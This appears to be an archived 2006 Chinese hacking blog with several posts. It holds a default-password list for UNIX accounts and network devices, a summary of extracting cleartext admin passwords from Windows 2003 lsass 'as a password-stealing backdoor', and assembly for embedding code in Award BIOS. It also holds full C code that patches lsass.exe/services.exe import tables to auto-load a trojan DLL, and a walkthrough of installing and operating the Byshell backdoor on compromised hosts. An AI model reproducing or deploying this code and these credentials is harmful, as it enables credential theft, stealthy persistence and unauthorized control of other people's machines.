UNIX Generic Multi bin sys Admin
UNIX Generic Multi bin sys Admin
UNIX Generic Multi checkfs checkfs User
UNIX Generic Multi checkfsys checkfsys User
UNIX Generic Multi checksys checksys User
UNIX Generic Multi daemon daemon User
UNIX Generic Multi daemon (none) User
UNIX Generic Multi demo demo User
UNIX Generic Multi demo (none) User
UNIX Generic Multi demos demos User
UNIX Generic Multi demos (none) User
UNIX Generic Multi dni (none) User
UNIX Generic Multi dni dni User
UNIX Generic Multi fal (none) User
UNIX Generic Multi fal fal User
UNIX Generic Multi fax (none) User
UNIX Generic Multi fax fax User
UNIX Generic Multi ftp (none) User
UNIX Generic Multi ftp ftp User
UNIX Generic Multi games games User
UNIX Generic Multi games (none) User
UNIX Generic Multi gopher gopher User
UNIX Generic Multi gropher (none) User
UNIX Generic Multi guest guest User
UNIX Generic Multi guest guestgue User
UNIX Generic Multi guest (none) User
UNIX Generic Multi halt halt User
UNIX Generic Multi halt (none) User
UNIX Generic HP-UX Multi root hp Admin
UNIX Generic Multi informix informix User
UNIX Generic Multi install install Admin
UNIX Generic Multi lp lp User
UNIX Generic Multi lp bin User
UNIX Generic Multi lp lineprin User
UNIX Generic Multi lp (none) User
UNIX Generic Multi lpadm lpadm User
UNIX Generic Multi lpadmin lpadmin User
UNIX Generic Multi lynx lynx User
UNIX Generic Multi lynx (none) User
UNIX Generic Multi mail (none) User
UNIX Generic Multi mail mail User
UNIX Generic Multi man man User
UNIX Generic Multi man (none) User
UNIX Generic Multi me (none) User
UNIX Generic Multi me me User
UNIX Generic Multi mountfs mountfs Admin
UNIX Generic Multi mountfsys mountfsys Admin
UNIX Generic Multi mountsys mountsys Admin
UNIX Generic Multi news news User
UNIX Generic Multi news (none) User
UNIX Generic Multi nobody (none) User
UNIX Generic Multi nobody nobody User
UNIX Generic Multi nuucp (none) User
UNIX Generic Multi operator operator User
UNIX Generic Multi operator (none) User
UNIX Generic Multi oracle (none) User
UNIX Generic Multi postmaster postmast User
UNIX Generic Multi postmaster (none) User
UNIX Generic Multi powerdown powerdown User
UNIX Generic Multi rje rje User
UNIX Generic Multi root root Admin
UNIX Generic Multi root (none) Admin
UNIX Generic Multi setup setup Admin
UNIX Generic Multi shutdown shutdown User
UNIX Generic Multi shutdown (none) User
UNIX Generic Multi sync sync User
UNIX Generic Multi sync (none) User
UNIX Generic Multi sys sys Admin
UNIX Generic Multi sys system Admin
UNIX Generic Multi sys bin Admin
UNIX Generic Multi sysadm sysadm Admin
UNIX Generic Multi sysadm admin Admin
UNIX Generic Multi sysadmin sysadmin Admin
UNIX Generic Multi sy**in sy**in Admin
UNIX Generic Multi system_admin (none) Admin
Verifone Verifone Junior 2.05 (none) 166816
Vextrec Technology PC BIOS Console n/a Vextrex
Vobis PC BIOS Console n/a merlin
Watch guard firebox 1000 Multi admin (none) Admin
Wim Bervoets WIMBIOSnbsp BIOS Console n/a Compleri Admin
winwork iso sistemi Multi operator (none) Admin
WorldClient AdminServer HTTP:2001 WebAdmin Admin WorldClient
WWWBoard WWWADMIN.PL HTTP WebAdmin WebBoard Admin
Wyse Winterm 5440XL Console root wyse Admin
Wyse Winterm 5440XL VNC VNC winterm VNC
Xerox Multi Function Equipment Multi admin 2222 Admin combo fax/scanner/printer with network access
Xylan Omniswitch Telnet admin switch Admin
Xylan Omniswitch Telnet diag switch
Xyplex Routers Port 7000 n/a system Admin
Xyplex Terminal Server Port 7000 n/a access User
Xyplex Terminal Server Port 7000 n/a system Admin
Xyplex Routers Port 7000 n/a access User
Zenith PC BIOS Console n/a 3098z Admin
Zenith PC BIOS Console n/a Zenith Admin
ZEOS PC BIOS Console n/a zeosx Admin
Zyxel Generic Routers Telnet n/a
3COM CoreBuilder 7000/6000/3500/2500 Telnet debug synnet

发表于 @ 2006年04月15日 6:59 PM | 评论 (0)

获取win2k3的密码

    摘要：

其实这个方法比较早就发现了，在参加安全焦点峰会之前我写的那一篇关于从内存中抓取密码一文中提到了这个（后来冰哥给面子，做为了备选议题）。当时也是很无心，发现在lsass进程中存放着最近一次登陆的管理员的密码，而且是明文的。不过在其他系统上并没有找到，所以当时也没有发表出来。今天看到WinEggDrop贴出了代码，写的非常完整，转了过来，大家看看吧。
这里面有一点要注意，首先保存的密码是最近一次登陆的用户的密码，相对于“LocalSystem Remote Procedure Call (RPC)"的一定偏移处，WinEggDrop兄弟从这后面找到“02 00 00 00 00 00 00"，然后之后的UNICODE数据就是明文的密码。在lsass进程中通常有两个地方有”LocalSystem Remote Procedure Call (RPC)“。但是密码只有第一处有。
其次，如果想做为一个偷密码的后门的话，就做个程序加入到启动项，在执行时肯定就是当前登陆用户的密码， ^_^

再次感谢    （全文共16243字）——点击此处阅读全文

发表于 @ 2006年04月15日 6:58 PM | 评论 (0)

[转贴]在BIOS中嵌入应用程序的方法及实现

一种在BIOS中嵌入应用程序的方法及实现

介绍
本文针对Award公司开发的计算机系统BIOS提出了一种嵌入应用程序的方法，其基本原理对别的品牌的BIOS也一样适用，仅需稍加修改。文中作者给出并讨论一个完整的例子程序，该程序已经通过实验验证。

一. BIOS简述
这里所讲的BIOS是指计算机主板上的BIOS，是整个计算机的关键和灵魂，计算机一启动就是执行BIOS程序，它负责加电自检，初始化计算系统，响应用户对系统配置的修改，记录数据到CMOS中，将常驻程序库（Runtime Program）常驻于内存中，提供给系统和应用程序调用，经过一系列复杂操作后，最后将控制权转移给操作系统。
一开始BIOS容量仅有8K，随着计算机复杂程度的提高，以及即插即用、高级电源管理等方面的需要，再加上个别主板厂商添加的辅助功能，BIOS容量迅速增大，目前通常主板上BIOS容量为256Kb，有些已经达到512Kb，这些BIOS中常常还会有几十Kb的剩余空间，而且由于BIOS多采用FlashRom作为存储芯片，便于修改，这就为我们在BIOS中嵌入自己的程序提供了便利。
在BIOS中嵌入程序具有多方面的应用，有些主板厂商在BIOS中嵌入杀毒程序，硬盘恢复精灵，超频工具等，提高了产品的竞争力；台湾威胜公司和Elegent公司联合开发出了嵌入在BIOS中的小型浏览器操作系统，整个BIOS大小仅有512Kb，计算机无需硬盘即可上网冲浪；有些监控系统由于功能简单，完全可以把程序做到BIOS中，一开机就自动运行，既提高了可靠性，又降低了成本。另一方面，将病毒嵌入到BIOS中，一开机就常驻内存也完全可以做到。
BIOS代码虽短，但技术含量相当高，全世界仅有AWARD、PHOENIX、AMI、ACER等几家公司有研发BIOS系统的能力（AWARD 已被PHOENIX收购），其他主板厂商有的是直接购买，有的也会在以上几家公司提供的平台上进行少量功能扩展。作为个别应用的场合，就要完全靠自己对BIOS进行改造。

二. 嵌入程序的基础知识
在进行工作前需要几个必备的工具，一个是AWARD公司的BIOS刷新工具AwdFlash；另一个Award BIOS 察看修改工具Cbrom；还有一个是MicroSoft 的汇编工具Masm6.11；最后是作者推荐的二进制文本编辑器HexWorkshop，这些工具都可以从网上下载，下面假定读者已经熟练使用这些工具，具体操作步骤不再祥述。
前面提到BIOS程序是存放在FlashROM芯片中的，实际上它是经过压缩后再存放进去的，仅留下少量启动代码和解压缩程序保持原样，BIOS的执行过程其实相当复杂，好在我们无需去了解其中的详细流程，但有一点应当清楚，BIOS程序实际上也是采用的模块化设计思想，用Cbrom可以察看到BIOS中各个子模块的名称，性质，压缩率等信息，BIOS在执行过程中会将这些模块解压缩到内存中，验证模块的合法性和正确性，如果满足条件，就会转到模块的入口处执行。这里面的详细机制和由来需要参考PNPBIOS协议、PNPISA协议、PCI总线协议和EISA总线协议，内容繁多，本文不拟做深入探讨。
BIOS中有一种模块是ISA模块，来源于ISA协议，由于ISA协议属于早期的协议，内容相对简单，BIOS对ISA模块的验证也较为简单，容易满足，我们可以将自己的程序做成ISA模块挂到BIOS中，这样机器一启动，我们的程序就会启动，而且我们程序的运行是先于操作系统的。
三. 程序设计详细步骤
1. 设计准备
由于系统固有的限制，BIOS中每个模块的大小不能超过64Kb，这里是指没有压缩前的大小，这和DOS下COM程序的限制很相似，实际上我们在用MASM6.11进行编程时的确采用是COM程序的模板，由编译器生成COM文件。然而它又和一般的COM文件具有以下几点不同：
1. 首先它有自己的堆栈段，堆栈大小默认为1K，而COM文件的堆栈是在64K之内的，默认是从段内偏移量0FFFEh处开始。
2. COM文件一开始就是执行代码，而模块一开始是模块头，储存有与模块相关的信息。模块执行代码的入口点在模块中的某一处。
3. COM文件执行完后返回到操作系统，通常通过子功能号4ch的中断INT21h返回到DOS，而模块是远程调用返回，也就是说必须用RETF返回。
4. ISA模块最后一个字节是校验码，所有的字节相加必须为0，BIOS利用这点来验证一个ISA模块的正确性。COM文件没有这点要求。
5. COM文件执行时是先被完整地复制到段内偏移量100h处，然后再执行，而模块的段内偏移量不能确定，有的模块会是0。所以涉及到段内偏移量的汇编指令，如LEA、OFFSET要谨慎适用。
下表是ISA模块头的格式，其中仅列出了几个最基本的相关字段，这是协议中的内容，我们在编写模块头时，需要严格遵循下表的格式：

偏 移 长 度 值 说 明
0h 1 55h 模块标签字节1
1h 1 AAh 模块标签字节2
2h 1 * 模块长度（以512字节为单位）
3h 3 * 入口点，BIOS对此位置做远调用，这里往往放一条跳转指令
6h~19h 20 * 保留

表一 模块头格式
通常一个BIOS嵌入程序设计的基本流程如下，每一步都很关键，有必要给出详细说明：
1. 首先用汇编编写DOS下的COM程序，必须注意到程序是先于操作系统执行的，所以程序中不能调用任何DOS的中断服务。为了程序转化方便，也不要用.code，.startup等汇编伪指令，尽量采用早期的汇编编写方式，争取对整个程序结构的完全控制。
2. 调试通过后，在COM文件前加上文件头，改变返回指令为RETF，控制文件大小为512字节的整数倍，重新编译生成COM文件。
3. 在HexWorkshop中调入刚生成的COM文件，利用其中的checksum工具生成文件的校验码，用100h减去该8位校验码后填入文件最后一个字节。再次生成文件的校验码，确认为零。
4. 用Cbrom将文件作为ISA模块嵌入到BIOS中，在本文中的操作为 “Cbrom save.bin/isa hello.com”，其中save.bin是事先用AwdFlash备份的BIOS文件。注意反复操作时，要先将前一个给释放掉，操作为“Cbrom save.bin/isa release”。
5. 用AwdFlash将新的BIOS文件烧录到FlashROM中。重起计算机，检验程序。
进行以上实验前，最好自备编程器，万一计算机不能正常启动，也可以重新恢复BIOS，如果可以用本身具有双BIOS保护功能的计算机进行实验则更加保险。
下面设计两个简单的Hello程序，分别采用了两种不同的方式，两个程序都是在屏幕上显示一行字“Hello！Press F1 to continue…”，当按下F1功能键后，程序退出，计算机继续启动。
2. Hello程序一
下面给出的源代码是在上面流程2中的文件，所以已经添加了文件头，编译后生成的COM文件是不能在DOS下执行的，请读者务必注意。另外由于程序功能简单，所以在这里文件大小限制为512字节，对不同规模的程序，会有一些小小的变动。程序中所有的中断调用都是BIOS中断服务调用，具体调用规则不做详细说明，请读者查阅有关资料。
；Hello源程序一
code segment
assume cs:code,ds:code
start:

signature db 55h,0aah
comlength db 01h ；文件长512字节
jmp near ptr begin0
reserved db 20 dup(?)

begin0:

mov di,25
mov ah,2
mov bh,0
mov dx,di
mov dh,10 ；将光标移至屏幕
int 10h ；10行25列处

mov si,offset string
；在DOS下调试时应在这里添加 add si,100h
showstr:
mov ah,9
mov al,[si]
and al,0ffh
jz kbinput
mov bh,0
mov bl,0DAh
mov cx,1
int 10h
,
mov ah,2
mov bh,0
inc di
mov dx,di
mov dh,10
int 10h
jmp showstr ；输出字符串

kbinput:
mov ah,0
int 16h
cmp ah,3bh ；接受键盘输入
jne kbinput ；按F1往下执行

mov ax，0 ；返回参数
retf ；远程调用返回

string db 'Hello! Press F1 to continue...',00h ；00h标志字符串结束
org 511 ；文件末尾
checksum db ？
code ends
end start

将上述程序烧入BIOS中运行时，在第一屏信息显示过后，会在第二屏正中央显示一条红底白字的信息，提示按F1键继续，按F1键后，BIOS继续下面的启动步骤。显示第三屏启动信息，即原先的第二屏信息，最后加载操作系统。
以上程序假定了BIOS会将模块解压至段首运行，事实也确是如此，但由于没查到相关资料，目前还不能肯定总会如此。这一点将在下一个Hello程序中有所改进。
3. Hello程序二
Hello程序一在BIOS没有初始化完全的时候即进入运行，所以对程序功能有更多限制，有些BIOS中断服务还不具备，任何对这些服务的调用都会产生意想不到的结果。考虑到BIOS在加载操作系统时实际上是用的INT 19h，Hello程序二就利用挂钩19h中断的方法抢在操作系统之前，BIOS初始化之后运行，这样就可以完整地利用整个计算机系统的所有资源了。
另外必须指出的是，模块本身有责任保持整个模块的校验和为零，也就是说，ISA模块进驻内存中后就不能卸出，BIOS会在模块返回后检查整个模块的检验和，判断模块的正确性，如果错误，则会死机。模块在初始运行时可以更改自己段内的数据，而在BIOS初始化完毕后，模块就不能再有改变自身数据的操作。
；Hello源程序二
.model tiny
.386
code segment
assume cs:code,ds:code
start:
signature db 55h,0aah
comlength db 01h ；文件长512字节
jmp near ptr begin0
reserved db 20 dup(?)
begin0:
call getip ；得到模块的起始段内偏移量
；保存在参数ipstart中
mov ax,0 ；挂钩19h中断
mov es,ax ；保存原来的入口到
mov ax,es:[64h] ；saveip与savecs
mov saveip,ax
mov ax,es:[66h]
mov savecs,ax
mov ax,offset begin1
add ax,ipstart
mov es:[64h],ax
mov es:[66h],cs

mov ax,0 ；重新计算校验码
mov si,510 ；注意不要记入最后一个字节
again: add ax,cs:[si]
dec si
jns again
neg al ；改变最后一个字节
mov checksum,al ；使整个模块校验和为零

mov ax,0
retf ；远程调用返回

begin1: ；19h中断入口
sti ；开中断
pusha
push es
push ds ；保存调用参数

mov ax,cs
mov ds,ax

mov ax,0 ；恢复原19h中断入口
mov es,ax
mov ax,saveip
mov es:[64h],ax
mov ax,savecs
mov es:[66h],ax
；以下基本与程序一相同
；这里为节约篇幅用……代替
；……
mov si,offset string
add si,ipstart ；注意
；……
pop ds
pop es
popa
int 19h ；激发19h中断
iret

getip proc ；得到模块的起始
pop ax ；段内偏移量子程序
push ax
sub ax,29 ；29=模块头大小加3
mov ipstart,ax
ret
getip endp

string db 'Hello! Press F1 to continue...',00h

saveip dw ?
savecs dw ?
ipstart dw ?

org 511
checksum db ?

code ends
end start

Hello2程序在执行时，会在第二屏启动画面的最后一行显示一段黑底白字“Hello! Press F1 to continue...”，当按下F1后，计算机就开始加载操作系统。
需要注意的是，在DOS或Windows下调试Hello程序二时，是不能用19h中断的，任何对19h中断的调用要么结束当前程序，要么会造成死机，所以调试时需要暂时用别的中断代替，如保留中断2bh，当调试成功以后，再将中断改回为19h。
另一个在Hello1与Hello2程序中都要注意的问题是，在程序中不要轻易改动模块头的模块长度字节的值，PCI模块支持并赞成这样的改动，而ISA模块没找到相关资料，笔者曾尝试过改动这一值，结果导致Windows98不能进入通常模式。
四. 结束语
在编程实践中作者感到编写BIOS的嵌入程序具有相当难度，它需要有扎实的汇编语言功底和对计算机硬件系统的深入了解，更需要在实践中不断地摸索BIOS程序的特点，只有这样才能够编写出精悍的代码，满足实践应用的需要。

发表于 @ 2006年04月13日 11:23 PM | 评论 (0)

修改导入表载入DLL

关于修改EXE文件的导入表,实际上是一个很古老的话题了(如果您是此中高手,请不要在这篇文章浪费时间了,如果您发现了其中的问题,还请多多指教).一些PE相关的软件,也都实现了这样的功能,例如Stud_PE.
Stud_PE通过添加一个新节并将导入表连同添加的内容一并复制到新节的方法来实现对DLL的导入.
使用这样的方法只要是PE格式的EXE文件,都可以实现导入DLL的功能,但此方法,实现了通用性,却增加了文件的大小.
对于存放在磁盘上PE文件,其中存在着大量的空隙,我们知道PE中的数据是按照一定的文件对齐来组织.IMAGE_OPTIONAL_HEADER结构中的FileAlignment成员保存着文件对齐的大小,这个成员是在链接的时候由链接器指定,如果使用VC来编写程序,可以使用link中的/filealign来调整文件对齐的大小.
这里,就是利用这些空隙来使EXE在启动时载入DLL(类似于一些病毒的技术),同时并不改变文件的大小.如何实现?还是要修改导入表.然而这种方法的缺点也是很明显的,并不是每个EXE都有足够的空间让我们来插入数据,按照我的测试,在Windows 2003 Enterprise sp1中,lsass.exe以及services.exe都是有足够的空间进行插入,而在Windows 2000 Advance Server sp4中,lsass.exe无法插入,services.exe可以插入.这些EXE文件的FileAlignment为0x200H.为什么选择这些exe文件?说到这里我的意图已经很明显了,黑客之门便是利用这种方法实现自启动的木马.
上面说了堆废话,现在直接贴上代码,具体实现请见程序的注释.这里假定您对PE格式有一定的了解.

//
// Copy from Matt Pietrek
// Given an RVA, look up the section header that encloses it and return a
// pointer to its IMAGE_SECTION_HEADER
//
PIMAGE_SECTION_HEADER
GetEnclosingSectionHeader(
DWORD rva,
PIMAGE_NT_HEADERS pNTHeader
)
{
PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION32(pNTHeader);
unsigned i;

for ( i=0; i < pNTHeader->FileHeader.NumberOfSections; i++, section++ )
{
// Is the RVA within this section?
if ( (rva >= section->VirtualAddress) &&
(rva < (section->VirtualAddress + section->Misc.VirtualSize)))
return section;
}

return 0;
}


int
AddImportDll(
HANDLE hFile,
DWORD dwBase,
PIMAGE_NT_HEADERS pNTHeader
)
{
//
// 通过OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress
// 获得导入表的RVA, 利用此RVA找到ImportTable所在的Section,之后计算Offset,公式:
// Offset = (INT)(pSection->VirtualAddress - pSection->PointerToRawData)
// 之后利用Offset来定位文件中ImportTable的位置.
//
PIMAGE_IMPORT_DESCRIPTOR pImportDesc = 0;
PIMAGE_SECTION_HEADER pSection = 0;
PIMAGE_THUNK_DATA pThunk, pThunkIAT = 0;
int Offset = -1;

pSection = GetEnclosingSectionHeader(
pNTHeader->OptionalHeader.DataDirectory
[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress,
pNTHeader);
if(!pSection)
{
fprintf(stderr, "No Import Table..\n");
return -1;
}

Offset = (int) (pSection->VirtualAddress - pSection->PointerToRawData);

//
// 计算ImportTable在文件中的位置
//
pImportDesc =
(PIMAGE_IMPORT_DESCRIPTOR)(pNTHeader->OptionalHeader.DataDirectory
[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress - Offset + dwBase);

//
// 取出导入的DLL的个数
//
int nImportDllCount = 0;
while(1)
{
if ((pImportDesc->TimeDateStamp==0 ) && (pImportDesc->Name==0))
break;
pThunk = (PIMAGE_THUNK_DATA)(pImportDesc->Characteristics);
pThunkIAT = (PIMAGE_THUNK_DATA)(pImportDesc->FirstThunk);

if(pThunk == 0 && pThunkIAT == 0)
return -1;

nImportDllCount++;
pImportDesc++;
}

//
// 恢复pImportDesc的值,方便下面的复制当前导入表的操作.
//
pImportDesc -= nImportDllCount;

//
// 取得ImportTable所在Section的RawData在文件中的末尾地址,计算公式:
// dwOrigEndOfRawDataAddr = pSection->PointerToRawData + pSection->Misc.VirtualSize
//
DWORD dwEndOfRawDataAddr = pSection->PointerToRawData + pSection->Misc.VirtualSize;

PIMAGE_IMPORT_DESCRIPTOR pImportDescVector =
(PIMAGE_IMPORT_DESCRIPTOR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 20 * (nImportDllCount+1));
if(pImportDescVector == NULL)
{
fprintf(stderr, "HeapAlloc() failed. --err: %d\n", GetLastError());
return -1;
}
CopyMemory(pImportDescVector+1, pImportDesc, 20*nImportDllCount);


//
// 构造添加数据的结构,方法笨拙了点.
//
struct _Add_Data
{
char szDllName[256]; // 导入DLL的名字
int nDllNameLen; // 实际填充的名字的长度
WORD Hint; // 导入函数的Hint
char szFuncName[256]; // 导入函数的名字
int nFuncNameLen; // 导入函数名字的实际长度
int nTotal; // 填充的总长度
} Add_Data;
const char szDll[256] = "test.dll";
const char szFunc[256] = "Startup";
strcpy(Add_Data.szDllName, szDll);
strcpy(Add_Data.szFuncName, szFunc);

//
// +1表示'\0'字符
//
Add_Data.nDllNameLen = strlen(Add_Data.szDllName) + 1;
Add_Data.nFuncNameLen = strlen(Add_Data.szFuncName) + 1;
Add_Data.Hint = 0;
//
// 计算总的填充字节数
//
Add_Data.nTotal = Add_Data.nDllNameLen + sizeof(WORD) + Add_Data.nFuncNameLen;

//
// 检查ImportTable所在的Section中的剩余空间是否能够容纳新的ImportTable.
// 未对齐前RawData所占用的空间存放在pSection->VirtualSize中,用此值加上新的ImportTable长度与
// 原长度进行比较.
//
// nTotalLen 为新添加内容的总长度
// Add_Data.nTotal 为添加的DLL名称,Hint与导入函数的名字的总长度.
// 8 为IMAGE_IMPORT_BY_NAME结构以及保留空的长度.
// 20*(nImportDllCount+1) 为新的ImportTable的长度.
//
int nTotalLen = Add_Data.nTotal + 8 + 20*(nImportDllCount+1);
printf("TotalLen: %d byte(s)\n", nTotalLen);
if(pSection->Misc.VirtualSize + nTotalLen > pSection->SizeOfRawData)
{
fprintf(stderr, "No enough space!\n");
return -1;
}

IMAGE_IMPORT_DESCRIPTOR Add_ImportDesc;
//
// ThunkData结构的地址
//
Add_ImportDesc.Characteristics = dwEndOfRawDataAddr + Add_Data.nTotal + Offset;
Add_ImportDesc.TimeDateStamp = -1;
Add_ImportDesc.ForwarderChain = -1;
//
// DLL名字的RVA
//
Add_ImportDesc.Name = dwEndOfRawDataAddr + Offset;
Add_ImportDesc.FirstThunk = Add_ImportDesc.Characteristics;

CopyMemory(pImportDescVector, &Add_ImportDesc, 20);

//
// 对文件进行修改
//
DWORD dwBytesWritten = 0;
DWORD dwBuffer = dwEndOfRawDataAddr + Offset + Add_Data.nTotal + 8;
long lDistanceToMove = (long)&(pNTHeader->OptionalHeader.DataDirectory
[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress) - dwBase;
int nRet =0;

//
// 修改IMAGE_DIRECTOR_ENTRY_IMPORT中VirtualAddress的地址,
// 使其指向新的导入表的位置
//
SetFilePointer(hFile, lDistanceToMove, NULL, FILE_BEGIN);

printf("OrigEntryImport: %x\n", pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
nRet = WriteFile(hFile, (PVOID)&dwBuffer, 4, &dwBytesWritten, NULL);
if(!nRet)
{
fprintf(stderr, "WriteFile(ENTRY_IMPORT) failed. --err: %d\n", GetLastError());
return -1;
}
printf("NewEntryImport: %x\n", pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
//
// 修改导入表长度,这个部分具体要修改为多少我也没弄明白,不过按照测试,改与不改都可以工作
//
dwBuffer = pNTHeader->OptionalHeader.DataDirectory
[IMAGE_DIRECTORY_ENTRY_IMPORT].Size + 40;
nRet = WriteFile(hFile, (PVOID)&dwBuffer, 4, &dwBytesWritten, NULL);
if(!nRet)
{
fprintf(stderr, "WriteFile(Entry_import.size) failed. --err: %d\n", GetLastError());
return -1;
}

//
// 修改ImportTable所在节的长度
//
lDistanceToMove = (long)&(pSection->Misc.VirtualSize) - dwBase;
SetFilePointer(hFile, lDistanceToMove, NULL, FILE_BEGIN);
dwBuffer = pSection->Misc.VirtualSize + nTotalLen;
nRet = WriteFile(hFile, (PVOID)&dwBuffer, 4, &dwBytesWritten, NULL);
if(!nRet)
{
fprintf(stderr, "WriteFile(Misc.VirtualSize) failed. --err: %d\n", GetLastError());
return -1;
}

//
// 从节的末尾添加新的DLL内容
// 偷点懒,返回值就不检查了..
//
lDistanceToMove = dwEndOfRawDataAddr;
SetFilePointer(hFile, lDistanceToMove, NULL, FILE_BEGIN);
nRet = WriteFile(hFile, Add_Data.szDllName, Add_Data.nDllNameLen, &dwBytesWritten, NULL);
nRet = WriteFile(hFile, (LPVOID)&(Add_Data.Hint), sizeof(WORD), &dwBytesWritten, NULL);
nRet = WriteFile(hFile, Add_Data.szFuncName, Add_Data.nFuncNameLen, &dwBytesWritten, NULL);
dwBuffer = dwEndOfRawDataAddr + Add_Data.nDllNameLen + Offset;
nRet = WriteFile(hFile, (LPVOID)&dwBuffer, 4, &dwBytesWritten, NULL);
dwBuffer = 0;
nRet = WriteFile(hFile, (LPVOID)&dwBuffer, 4, &dwBytesWritten, NULL);
nRet = WriteFile(hFile, (LPVOID)pImportDescVector, 20*(nImportDllCount+1), &dwBytesWritten, NULL);

HeapFree(GetProcessHeap(), 0, pImportDescVector);
return 0;
}

下面是测试用的DLL代码.
#include
#pragma comment(lib, "user32")

#define __DLL_EXPORT extern "C" __declspec(dllexport)

__DLL_EXPORT void Startup();

BOOL
WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved
)
{
switch(fdwReason)
{
case DLL_PROCESS_ATTACH:
MessageBox(NULL, "Hook Ok!", "info", MB_OK);
break;

case DLL_THREAD_ATTACH:
break;

case DLL_PROCESS_DETACH:
break;

case DLL_THREAD_DETACH:
break;
}

return TRUE;
}


__DLL_EXPORT void
Startup()
{
MessageBox(NULL, "Startup()", "info", MB_OK);
}

这段代码还有些问题,一些EXE文件并不能保证在修改后正确的运行,如何解决?如果您对此感兴趣,请动手来寻找答案吧.
说点题外话,如果您的系统不幸中了黑客之门,并且您的手头没有windows安装光盘或者DLLCACHE中也没有备份的话.首先要找到被修改的exe文件,之后建立一个备份用Stud_PE打开这个备份,在"头部"标签中"更多"下拉菜单中选IMAGE_DIR_ENTRY_DEBUG,这时,下拉菜单下面的两个对话框中会有两个值,这两个值就是黑可之门修改之前原始的导入表的位置.用这两个值替换"导入表"后面的内容,之后选"保存到文件",退出Stud_PE用inuse替换,重启之后删除后门dll便可以了.

使用工具:
hkdoordll.dll(1.1版本)
Stud_PE 2.0.0.1
dumpbin.exe

参考资料:
《Windows 95 System programming SECRETS (中译本)》

By CDrea
http://www.safechina.net
CDrea@safechina.net

发表于 @ 2006年04月13日 11:15 PM | 评论 (0)

[Byshell后门]无进程无DLL无硬盘文件无启动项

现在网络上流行的木马后门类工具很多，但可以称为精品的则没有多少，大多数新手们还在使用Radmin一类的软件来替代后门程序。不幸的是，它们并不是一个真正的后门，极容易服务器管理员察觉，因此肉鸡经常飞掉也就很正常了。

  一个合格的后门至少应该做到不能有陌生进程存在于任务管理器里，给后门进程起一个看起来像系统进程的名字只是掩耳盗铃；不能在注册表Run启动项或者服务启动项里留下众所周知的启动键值或新增服务，当然更不能直接写开始菜单的启动项；不能如同无视管理员或者防火墙一般明目张胆地打开陌生端口；像Bits.dll那样等待连接时无端口，连接时开端口的程序，在端口检查时只有30%的几率能逃脱。另外后门最好能隐藏自己生成的文件，或者避免感染一些管理员经常检查完整性的系统文件。前三点没有做到的后门程序不是一个“比较高级”的后门程序，当然在使用的时候也就没有稳定性、保密性可言了。
  按照我的分类，现在常见的后门大概可以分成三个“级别”：
  ★应用级。如WinShell、Radmin、冰河等，它们基本没有采取别的方法来隐藏自己，只是一个普通的能够实现远程控制的应用程序而已。
  ★系统级。多多少少采用了一些Ring3下隐藏行踪的编程技术，用得少的比如Bits.dll，Portless，用得多的比如Hxdef。

小提示：Hxdef虽然有一个驱动，但是它对系统的Hook全都是Ring3的，因此大家倾向于称它为系统级而非内核级后门。

  ★内核级，后门主要部分工作在Ring0，因此有很强的隐蔽性和杀伤力。但是公布的完整的内核级后门数量不多，兼容性也不近人意。这个话题在Phrack和Rootkit.com上有很多有价值的讨论和成果公布。
  我在自己写的系统级后门Byshell v0.64中尽力做到以上的要求，然而由于个人能力有限，功能的实现不够全面、稳定，希望大家能给我提好的意见或者替我升级版本。在这篇文章中我将和大家讨论这个开源后门的设计、实现，当然还有实际的应用举例，希望高手不要扔板砖，大家一起讨论。

应用举例
这是一个实现了无进程、无DLL、无硬盘文件、无启动项的后门程序。利用线程注射DLL到系统进程，解除DLL映射并删除自身文件和启动项，关机时恢复。大量地借鉴和学习了农民Cmdbind2的思想，在这里对农民前辈无私共享的精神致以120分感谢。我允许此软件及其源代码自由传播，但引用时应注明出处。在联系作者并得到同意之前，不得将此软件改编或删选后用作商业用途，可用作学习和私人用途。
Byshell 0.64支持的命令列表如下：cmd，shell，endshell，chpass，byver，sysinfo，pslist，pskill，modlist，get，put，reboot，dettach，popmsg，SYN，queryDOS，endDOS，refresh等，具体用法请查看说明书。

小提示：说明书上遗漏了refresh命令，它的作用是清除死掉的连接，并且给你机会重新连接，也可以在你换了一个IP以后，清除原来的连接（否则不能正常连接）。

安装后门时只要把Ntboot.exe和Ntboot.dll上传到肉鸡同一目录并且执行“ntboot.exe –install”即可，安装完成后可手动删除Ntboot.exe和Ntboot.dll，连接的时候用By064cli.exe。注意Byshell v0.64不支持本机对本机测试，v 0.63可以。现在我用v 0.63演示一下使用的效果：
1．连接：
please input the server ip address
127.0.0.1
127.0.0.1 will be connected
input the password(the default one is ’by’)
by
#cmddir c:
驱动器 C 中的卷没有标签。
卷的序列号是 CCB2-D751

c: 的目录

2005-01-29 14:22     <DIR>       Documents and Settings
2004-10-01 19:24     <DIR>       Inetpub
2004-11-17 20:56     <DIR>       Intel
2004-10-30 14:18           24,576 isapilog.dll
2004-11-11 00:55           24,576 magic_asp.dll
2005-02-07 21:47     <DIR>       My Music
2004-12-21 00:05             124 Operate.ini
2005-01-18 22:38     <DIR>       Program Files
2005-02-07 23:31     <DIR>       ubackup
2005-02-02 17:54     <DIR>       WINNT
          3 个文件       49,276 字节
          7 个目录   124,207,104 可用字节
2．获得并结束Shell：
#shell
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:WINNTsystem32>cd..
cd..

C:WINNT>cd..
cd..

C:>dir
dir
驱动器 C 中的卷没有标签。
卷的序列号是 CCB2-D751

C: 的目录

……省略
          3 个文件       49,276 字节
          7 个目录   124,207,104 可用字节

C:>endshell
shell terminated
#byver
ByShell server version 0.63
Released Dec 19,2004 Copyleft@ "by" co.ltd.
3．进程列举与Kill。这里有BUG，排列不整齐。
#pslist
process:
pid   filename     num_thread     parentpid
8     System 43     0
184   smss.exe     6     8
208   csrss.exe     11     184
232   winlogon.exe   19     184
260   services.exe   31     232
272   lsass.exe     17     232
